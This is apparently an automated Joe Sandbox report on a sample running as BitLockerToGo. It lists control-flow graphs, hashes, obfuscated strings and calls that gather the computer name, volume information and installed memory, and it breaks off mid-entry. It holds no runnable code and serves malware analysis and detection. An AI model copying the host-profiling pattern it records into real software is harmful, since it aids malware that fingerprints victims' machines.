                                                                            control_flow_graph 19 552ac0-552b1f 20 552b20-552b42 19->20 20->20 21 552b44-552b5e 20->21 23 552b60 21->23 24 552b6b-552bb9 21->24 23->24 26 552bbf-552bf7 24->26 27 55310a-553136 call 55b2a0 GetVolumeInformationW 24->27 29 552c00-552c1f 26->29 32 55313c-55315f call 54a1f0 27->32 33 55326e-553275 27->33 29->29 30 552c21-552c58 SysAllocString 29->30 36 5530f6-553106 30->36 37 552c5e-552c78 CoSetProxyBlanket 30->37 41 553160-553168 32->41 36->27 39 5530ec-5530f2 37->39 40 552c7e-552c97 37->40 39->36 43 552ca0-552cf6 40->43 41->41 44 55316a-55316c 41->44 43->43 45 552cf8-552d71 43->45 46 55317e-5531ad call 54a1f0 44->46 47 55316e-55317b call 5289c0 44->47 54 552d80-552d92 45->54 53 5531b0-5531b8 46->53 47->46 53->53 55 5531ba-5531bc 53->55 54->54 56 552d94-552db6 54->56 57 5531ce-5531fd call 54a1f0 55->57 58 5531be-5531cb call 5289c0 55->58 67 5530d4-5530e5 56->67 68 552dbc-552dde 56->68 64 553200-553208 57->64 58->57 64->64 66 55320a-55320c 64->66 69 55321e-55324b call 54a1f0 66->69 70 55320e-55321b call 5289c0 66->70 67->39 76 552de4-552de7 68->76 77 5530ca-5530d0 68->77 80 553250-553258 69->80 70->69 76->77 79 552ded-552df2 76->79 77->67 79->77 82 552df8-552e52 79->82 80->80 83 55325a-55325c 80->83 87 552e60-552eb4 82->87 83->33 84 55325e-55326b call 5289c0 83->84 84->33 87->87 89 552eb6-552ec8 87->89 90 552ecc-552ed5 89->90 91 5530b9-5530c6 90->91 92 552edb-552ee1 90->92 91->77 92->91 93 552ee7-552ef1 92->93 95 552f35 93->95 96 552ef3-552ef8 93->96 97 552f37-552f51 call 528830 95->97 98 552f0c-552f10 96->98 107 553064-553075 97->107 108 552f57-552f61 97->108 99 552f00 98->99 100 552f12-552f1b 98->100 105 552f01-552f0a 99->105 102 552f1d-552f28 100->102 103 552f2a-552f2e 100->103 102->105 103->105 106 552f30-552f33 103->106 105->97 105->98 106->105 110 553077 107->110 111 55307c-55308b 107->111 108->107 109 552f67-552f6f 108->109 112 552f70-552f7a 109->112 110->111 113 553092-5530b5 call 528860 call 528840 111->113 114 55308d 111->114 116 552f90-552f96 112->116 117 552f7c-552f81 112->117 113->91 114->113 120 552fb4-552fc0 116->120 121 552f98-552f9b 116->121 119 553010-553016 117->119 125 553018-55301e 119->125 122 552fc2-552fc5 120->122 123 55302a-553032 120->123 121->120 126 552f9d-552fb2 121->126 122->123 127 552fc7-553009 122->127 130 553034-553036 123->130 131 553038-55303b 123->131 125->107 129 553020-553022 125->129 126->119 127->119 129->112 132 553028 129->132 130->125 133 553060-553062 131->133 134 55303d-55305e 131->134 132->107 133->119 134->119
                                                                            APIs
                                                                            • SysAllocString.OLEAUT32 ref: 00552C24
                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00552C70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocBlanketProxyString
                                                                            • String ID: ~$C$LM$\$u$~w$MO
                                                                            • API String ID: 900851650-1221608508
                                                                            • Opcode ID: e317aac0f35120a74b0483a3e7f96b65396acc8274899064ba1edbc52a62780d
                                                                            • Instruction ID: b92a616c27f21276fda1d4cd79231bae438374eafd364c240172b90124494121
                                                                            • Opcode Fuzzy Hash: e317aac0f35120a74b0483a3e7f96b65396acc8274899064ba1edbc52a62780d
                                                                            • Instruction Fuzzy Hash: 3F222172A083119FE320CF24C855B6BBFA5FF81351F04892DE9859B2D1D775EA09CB92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 135 52d100-52d127 136 52d130-52d155 135->136 136->136 137 52d157-52d16e call 528f60 call 552ac0 136->137 141 52d173-52d194 137->141 142 52d1a0-52d1ba 141->142 142->142 143 52d1bc-52d21f 142->143 144 52d220-52d250 143->144 144->144 145 52d252-52d263 144->145 146 52d265-52d26f 145->146 147 52d27b-52d283 145->147 148 52d270-52d279 146->148 149 52d285-52d286 147->149 150 52d29b-52d2a8 147->150 148->147 148->148 151 52d290-52d299 149->151 152 52d2aa-52d2b1 150->152 153 52d2cb-52d2d3 150->153 151->150 151->151 154 52d2c0-52d2c9 152->154 155 52d2d5-52d2d6 153->155 156 52d2eb-52d40e 153->156 154->153 154->154 157 52d2e0-52d2e9 155->157 158 52d410-52d448 156->158 157->156 157->157 158->158 159 52d44a-52d483 158->159 160 52d490-52d4fa 159->160 160->160 161 52d4fc-52d548 call 52bf60 160->161
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: '1q$*!"#$/>?.$5(h7$BPW6$BTWN$EA$I^$ME$PN$\_$_ZJ~$zw`%
                                                                            • API String ID: 0-3504767403
                                                                            • Opcode ID: 6a3f4500caa3da0c69ce51ac6c07ada846b7f78ddb5d77cbac4e56d6423e6347
                                                                            • Instruction ID: 3de6031f7b984f7804e9d1695e598ac604f6d3336a94721a614bc9173aa0bbbf
                                                                            • Opcode Fuzzy Hash: 6a3f4500caa3da0c69ce51ac6c07ada846b7f78ddb5d77cbac4e56d6423e6347
                                                                            • Instruction Fuzzy Hash: 03A1DEB598D3D18AE371CF2598907EBBFE2AFD2304F19496CC4D94B291DB354809CB92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 368 545709-54575f call 55b2a0 372 545760-5457f3 368->372 372->372 373 5457f9-545805 372->373 374 545807-54580f 373->374 375 54581b-545827 373->375 376 545810-545819 374->376 377 545829-54582f 375->377 378 54583b-5458a6 call 55b2a0 GetComputerNameExA 375->378 376->375 376->376 379 545830-545839 377->379 383 5458b0-5458ef 378->383 379->378 379->379 383->383 384 5458f1-5458fa 383->384 385 5458fc-545902 384->385 386 54591b-545927 384->386 387 545910-545919 385->387 388 545929-54592f 386->388 389 54593b-545988 GetComputerNameExA 386->389 387->386 387->387 390 545930-545939 388->390 391 545990-5459b5 389->391 390->389 390->390 391->391 392 5459b7-5459c0 391->392 393 5459c2-5459c8 392->393 394 5459db-5459e7 392->394 397 5459d0-5459d9 393->397 395 5459e9-5459ef 394->395 396 5459fb-545a55 394->396 398 5459f0-5459f9 395->398 400 545a60-545a84 396->400 397->394 397->397 398->396 398->398 400->400 401 545a86-545a8f 400->401 402 545a91-545a97 401->402 403 545aab-545ab7 401->403 404 545aa0-545aa9 402->404 405 545ab9-545abf 403->405 406 545acb-545b22 call 55b2a0 403->406 404->403 404->404 407 545ac0-545ac9 405->407 411 545b30-545b78 406->411 407->406 407->407 411->411 412 545b7a-545b83 411->412 413 545b85-545b8f 412->413 414 545b9d 412->414 415 545b90-545b99 413->415 416 545ba0-545bb6 414->416 415->415 417 545b9b 415->417 418 545ce0-545d25 416->418 419 545bbc-545bc4 416->419 417->416 421 545d30-545d80 418->421 420 545bd0-545bda 419->420 422 545bf0-545bf6 420->422 423 545bdc-545be1 420->423 421->421 424 545d82-545d91 421->424 426 545c20-545c2f 422->426 427 545bf8-545bfb 422->427 425 545c90-545c94 423->425 428 545d93-545d99 424->428 429 545dab-545dae call 54a790 424->429 430 545c96-545c9e 425->430 433 545c31-545c34 426->433 434 545caa-545cb2 426->434 427->426 431 545bfd-545c12 427->431 432 545da0-545da9 428->432 437 545db3-545dd2 429->437 430->418 438 545ca0-545ca2 430->438 431->425 432->429 432->432 433->434 436 545c36-545c84 433->436 434->430 439 545cb4-545cb7 434->439 436->425 438->420 440 545ca8 438->440 441 545cdc-545cde 439->441 442 545cb9-545cda 439->442 440->418 441->425 442->425
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0054587A
                                                                            • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00545959
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: J(Z$ZH@B$_P\e
                                                                            • API String ID: 3545744682-201089876
                                                                            • Opcode ID: e39b4733948863c871430179a9ef62f5202e1110b21c02a4829ec617aaa7722a
                                                                            • Instruction ID: 0d3848047bdb4d60328d7166cedf16a83c46ed73ef6f262387f9219e30a02523
                                                                            • Opcode Fuzzy Hash: e39b4733948863c871430179a9ef62f5202e1110b21c02a4829ec617aaa7722a
                                                                            • Instruction Fuzzy Hash: 60F1E671614B818BE7298B35C4647F7BFE1AF66304F48886EC1EB87683EB746505CB21

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 576 52d9ae-52d9ef call 54cf20 call 529e80 CoUninitialize 581 52d9f0-52da11 576->581 581->581 582 52da13-52da36 581->582 583 52da40-52da8c 582->583 583->583 584 52da8e-52db01 583->584 585 52db10-52db38 584->585 585->585 586 52db3a-52db4b 585->586 587 52db6b-52db73 586->587 588 52db4d-52db5b 586->588 590 52db75-52db76 587->590 591 52db8b-52db98 587->591 589 52db60-52db69 588->589 589->587 589->589 592 52db80-52db89 590->592 593 52db9a-52dba1 591->593 594 52dbbb-52dbc7 591->594 592->591 592->592 595 52dbb0-52dbb9 593->595 596 52dbdb-52dbe5 594->596 597 52dbc9-52dbca 594->597 595->594 595->595 598 52dbe7-52dbeb 596->598 599 52dbfb-52dc07 596->599 600 52dbd0-52dbd9 597->600 601 52dbf0-52dbf9 598->601 602 52dc21-52dd46 599->602 603 52dc09-52dc0b 599->603 600->596 600->600 601->599 601->601 605 52dd50-52dda8 602->605 604 52dc10-52dc1d 603->604 604->604 606 52dc1f 604->606 605->605 607 52ddaa-52dddf 605->607 606->602 608 52dde0-52de06 607->608 608->608 609 52de08-52de53 call 52bf60 608->609
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: Uninitialize
                                                                            • String ID: Gw$PKNA$us$}/{
                                                                            • API String ID: 3861434553-2702230637
                                                                            • Opcode ID: b7c623525f5b0fb3e52900bca9eb1fcb98ddc1ba87fe11828c069ccb569f8d2c
                                                                            • Instruction ID: 0bf75ab35f7ea8488aabd52044e8dd600daacfc6aa9177659acf704e552a0c75
                                                                            • Opcode Fuzzy Hash: b7c623525f5b0fb3e52900bca9eb1fcb98ddc1ba87fe11828c069ccb569f8d2c
                                                                            • Instruction Fuzzy Hash: 90B1BF715083D18AD7358F25D8907EBBFE1BF97304F184AADD4C99B286C7388506CBA6

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 612 5456ff-545855 call 55b2a0 615 54585a-5458a6 GetComputerNameExA 612->615 616 5458b0-5458ef 615->616 616->616 617 5458f1-5458fa 616->617 618 5458fc-545902 617->618 619 54591b-545927 617->619 620 545910-545919 618->620 621 545929-54592f 619->621 622 54593b-545988 GetComputerNameExA 619->622 620->619 620->620 623 545930-545939 621->623 624 545990-5459b5 622->624 623->622 623->623 624->624 625 5459b7-5459c0 624->625 626 5459c2-5459c8 625->626 627 5459db-5459e7 625->627 630 5459d0-5459d9 626->630 628 5459e9-5459ef 627->628 629 5459fb-545a55 627->629 631 5459f0-5459f9 628->631 633 545a60-545a84 629->633 630->627 630->630 631->629 631->631 633->633 634 545a86-545a8f 633->634 635 545a91-545a97 634->635 636 545aab-545ab7 634->636 637 545aa0-545aa9 635->637 638 545ab9-545abf 636->638 639 545acb-545b22 call 55b2a0 636->639 637->636 637->637 640 545ac0-545ac9 638->640 644 545b30-545b78 639->644 640->639 640->640 644->644 645 545b7a-545b83 644->645 646 545b85-545b8f 645->646 647 545b9d 645->647 648 545b90-545b99 646->648 649 545ba0-545bb6 647->649 648->648 650 545b9b 648->650 651 545ce0-545d25 649->651 652 545bbc-545bc4 649->652 650->649 654 545d30-545d80 651->654 653 545bd0-545bda 652->653 655 545bf0-545bf6 653->655 656 545bdc-545be1 653->656 654->654 657 545d82-545d91 654->657 659 545c20-545c2f 655->659 660 545bf8-545bfb 655->660 658 545c90-545c94 656->658 661 545d93-545d99 657->661 662 545dab-545dae call 54a790 657->662 663 545c96-545c9e 658->663 666 545c31-545c34 659->666 667 545caa-545cb2 659->667 660->659 664 545bfd-545c12 660->664 665 545da0-545da9 661->665 670 545db3-545dd2 662->670 663->651 671 545ca0-545ca2 663->671 664->658 665->662 665->665 666->667 669 545c36-545c84 666->669 667->663 672 545cb4-545cb7 667->672 669->658 671->653 673 545ca8 671->673 674 545cdc-545cde 672->674 675 545cb9-545cda 672->675 673->651 674->658 675->658
                                                                            APIs
                                                                            • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0054587A
                                                                            • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00545959
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: ComputerName
                                                                            • String ID: J(Z$ZH@B
                                                                            • API String ID: 3545744682-986616880
                                                                            • Opcode ID: e4c24bfb5053b4cbbe52f80cdfb5ad8f35fb7c5962d6c747a96cb9a96948ba81
                                                                            • Instruction ID: a761f3f1e88725db6989e518e98ad8f28ef93a61ecae328ea8f3ac82a7b3a526
                                                                            • Opcode Fuzzy Hash: e4c24bfb5053b4cbbe52f80cdfb5ad8f35fb7c5962d6c747a96cb9a96948ba81
                                                                            • Instruction Fuzzy Hash: 13E1E571614B828BE7258B39C4607F7BFD1AF56304F48896ED0EB87683E734A505CB61

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 676 536f52-536f82 677 536f90-536fc0 676->677 677->677 678 536fc2-53700f call 533960 677->678 681 537010-53707d 678->681 681->681 682 53707f-5370f3 call 533960 681->682 685 537100-537114 682->685 685->685 686 537116-53716a call 533960 685->686 689 537170-5371d8 686->689 689->689 690 5371da-5371e5 call 533960 689->690 692 5371ea-5371f8 690->692 693 537200-537209 692->693 693->693 694 53720b-53720e 693->694 695 537210-537215 694->695 696 537217 694->696 697 53721a-537231 call 528830 695->697 696->697 700 537233-537238 697->700 701 537251-5372a4 697->701 703 537240-53724f 700->703 702 5372b0-5372e0 701->702 702->702 704 5372e2-5372ec 702->704 703->701 703->703 705 537311-537318 704->705 706 5372ee-5372f1 704->706 708 537320-537361 705->708 707 537300-53730f 706->707 707->705 707->707 709 537370-5373a2 708->709 709->709 710 5373a4-537406 call 533960 709->710 710->708
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 47$cVH$CM$sq$wu
                                                                            • API String ID: 0-442776925
                                                                            • Opcode ID: 2f99dcf1807bd2f58615b79ec6d06af5bdb84abd1731e80b203b2971cbd7c688
                                                                            • Instruction ID: 4bfea97e866d64ffec1b285f27d32a2171e72cd59045fef9d93ad48f4b2a070c
                                                                            • Opcode Fuzzy Hash: 2f99dcf1807bd2f58615b79ec6d06af5bdb84abd1731e80b203b2971cbd7c688
                                                                            • Instruction Fuzzy Hash: D7B111B6D1425C8BDF24CFA9D8812EEBFB2FF55314F198168E894AB341D7744901CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 714 545dd8-545de1 715 545de3-545e0a 714->715 716 545e4c-545e7a 714->716 717 545e10-545e49 715->717 716->717 718 545e7c-545e85 716->718 717->716 719 545e87-545e8d 718->719 720 545e9d 718->720 722 545e90-545e99 719->722 721 545ea0-545ecf 720->721 725 545ed0-545ef4 721->725 722->722 724 545e9b 722->724 724->721 725->725 726 545ef6-545eff 725->726 727 545f01-545f07 726->727 728 545f1b-545f27 726->728 729 545f10-545f19 727->729 730 545f41-545f84 call 55b2a0 GetPhysicallyInstalledSystemMemory call 54a1f0 728->730 731 545f29-545f2b 728->731 729->728 729->729 737 545f89-545fab 730->737 732 545f30-545f3d 731->732 732->732 734 545f3f 732->734 734->730 738 545fb0-545ff1 737->738 738->738 739 545ff3-54602f 738->739 740 546030-54607d 739->740 740->740 741 54607f-546088 740->741 742 5460ad-5460b0 741->742 743 54608a-546096 741->743 744 5460b3-5460bb 742->744 745 5460a0-5460a9 743->745 747 5460bd-5460bf 744->747 748 5460cb-5460d7 744->748 745->745 746 5460ab 745->746 746->744 749 5460c0-5460c9 747->749 750 5460d9-5460df 748->750 751 5460eb-546154 748->751 749->748 749->749 752 5460e0-5460e9 750->752 753 546160-5461b9 751->753 752->751 752->752 753->753 754 5461bb-5461c4 753->754 755 5461c6-5461cf 754->755 756 5461dd 754->756 757 5461d0-5461d9 755->757 758 5461e0-5461ec 756->758 757->757 761 5461db 757->761 759 5461ee-5461f4 758->759 760 54620b-54629f 758->760 762 546200-546209 759->762 763 5462a0-5462bb 760->763 761->758 762->760 762->762
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00545F6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: Q#Wa$Z64>
                                                                            • API String ID: 3960555810-459226772
                                                                            • Opcode ID: dc66655a12c0e0b3bfeea14f4dffd0ddaf96beb6ba32ac1e012e94e88cb4f2d7
                                                                            • Instruction ID: b0e53019d566336a88bae0bce8c6d9091bd0310dde0bdb9883eba76423824e20
                                                                            • Opcode Fuzzy Hash: dc66655a12c0e0b3bfeea14f4dffd0ddaf96beb6ba32ac1e012e94e88cb4f2d7
                                                                            • Instruction Fuzzy Hash: 1FD1B471604B818FD725CF39C4607A3BBE2AF96308F18896DC4EF87692D779A405CB51

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 765 545423-545ecf call 54c6b0 call 528840 771 545ed0-545ef4 765->771 771->771 772 545ef6-545eff 771->772 773 545f01-545f07 772->773 774 545f1b-545f27 772->774 775 545f10-545f19 773->775 776 545f41-545f60 call 55b2a0 774->776 777 545f29-545f2b 774->777 775->774 775->775 781 545f65-545f84 GetPhysicallyInstalledSystemMemory call 54a1f0 776->781 778 545f30-545f3d 777->778 778->778 780 545f3f 778->780 780->776 783 545f89-545fab 781->783 784 545fb0-545ff1 783->784 784->784 785 545ff3-54602f 784->785 786 546030-54607d 785->786 786->786 787 54607f-546088 786->787 788 5460ad-5460b0 787->788 789 54608a-546096 787->789 790 5460b3-5460bb 788->790 791 5460a0-5460a9 789->791 793 5460bd-5460bf 790->793 794 5460cb-5460d7 790->794 791->791 792 5460ab 791->792 792->790 795 5460c0-5460c9 793->795 796 5460d9-5460df 794->796 797 5460eb-546154 794->797 795->794 795->795 798 5460e0-5460e9 796->798 799 546160-5461b9 797->799 798->797 798->798 799->799 800 5461bb-5461c4 799->800 801 5461c6-5461cf 800->801 802 5461dd 800->802 803 5461d0-5461d9 801->803 804 5461e0-5461ec 802->804 803->803 807 5461db 803->807 805 5461ee-5461f4 804->805 806 54620b-54629f 804->806 808 546200-546209 805->808 809 5462a0-5462bb 806->809 807->804 808->806 808->808
                                                                            APIs
                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00545F6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                            • String ID: Q#Wa
                                                                            • API String ID: 3960555810-2813449535
                                                                            • Opcode ID: 870bc07dd9d9c2729cfb418612b6e843b9b4e11582466316892b811d99b10a67
                                                                            • Instruction ID: e08e89583ff41bb63186691aaff37d3da50b1ebbe3f7a05c8c95fbd0d8cea314
                                                                            • Opcode Fuzzy Hash: 870bc07dd9d9c2729cfb418612b6e843b9b4e11582466316892b811d99b10a67
                                                                            • Instruction Fuzzy Hash: 2AC17071504B418FD725CF3AC4607A3FBE1AF96318F18886EC4EB87692D779A406CB51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $#$X'e%
                                                                            • API String ID: 0-1943142432
                                                                            • Opcode ID: 3baca3a6ed2a59091d26102f99078b1b36034460c75a3ab585604bc8cec7301b
                                                                            • Instruction ID: 344ac6efccbf5d77cb141430f426f7e4c40931c91165bbe72cb07e11ea253ff3
                                                                            • Opcode Fuzzy Hash: 3baca3a6ed2a59091d26102f99078b1b36034460c75a3ab585604bc8cec7301b
                                                                            • Instruction Fuzzy Hash: D45115756083418BC7158F28C8917AFBFF2EFD6354F088A2CE5958B3A1D7798409DB52
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(00000000), ref: 005291F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: aeb085e3b6b32cf0ea233b20fc7eaf2b4f21b50dc35b70ca0548eae202b04405
                                                                            • Instruction ID: 233416da215d54cd3ec86978b5f757a488c3f8d65568fdb425a11bc14bded964
                                                                            • Opcode Fuzzy Hash: aeb085e3b6b32cf0ea233b20fc7eaf2b4f21b50dc35b70ca0548eae202b04405
                                                                            • Instruction Fuzzy Hash: E9510773F547290BC30CAEADDC96359BAD76BC8610F0E853DA884DB391E9B89C0586C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42b45bff83e430d12c01ea0736672ef4725da4d90e2f71695d9a9abdb9e1626c
                                                                            • Instruction ID: dc896209c3621dafaf05bbd30620dfec5ac892468eb9422702510da77724f157
                                                                            • Opcode Fuzzy Hash: 42b45bff83e430d12c01ea0736672ef4725da4d90e2f71695d9a9abdb9e1626c
                                                                            • Instruction Fuzzy Hash: 6A51AEB2904B418FC734CF28C895663BBE1BF5A304F188A6DD5EA8B652E734F905CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: "!"#
                                                                            • API String ID: 2994545307-388342572
                                                                            • Opcode ID: b0fc96ee28873245f6c35de1ee4442dea7daf4a6d8e311abd50086a455d6efb1
                                                                            • Instruction ID: 53e1cb3f7405387063e257d6072f2c1b8fd5d92eeeb38e76318f0590260986f9
                                                                            • Opcode Fuzzy Hash: b0fc96ee28873245f6c35de1ee4442dea7daf4a6d8e311abd50086a455d6efb1
                                                                            • Instruction Fuzzy Hash: 4D811472A083119FC7298F14D8A062BBFE2FBD5315F15852DED8597251DB71AC48C782
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(0055BC1B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0055818E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                            • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                            • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                            • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: sw
                                                                            • API String ID: 0-2343230549
                                                                            • Opcode ID: 96f2594cd4338d7fe4b640ccea48ec2c404a40182b15f3b8038ecba8dbb9ddb7
                                                                            • Instruction ID: dad21b6e41e54c0ce850d1641ffde68a5dc0951fde42d8e09b0511728f053949
                                                                            • Opcode Fuzzy Hash: 96f2594cd4338d7fe4b640ccea48ec2c404a40182b15f3b8038ecba8dbb9ddb7
                                                                            • Instruction Fuzzy Hash: 60512775A087A106D724B7246C1A7EF7E99AFD2318F05093CE449673C2EB256606C2D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 752c91ab4cf9655f81fd553a9420a4af839e72b950d81b9ea4f4854f9136b0fb
                                                                            • Instruction ID: cf13b61c5fe6706fee2da81cf014cdb6353e209b42c82d95e3ed07de9d0dc486
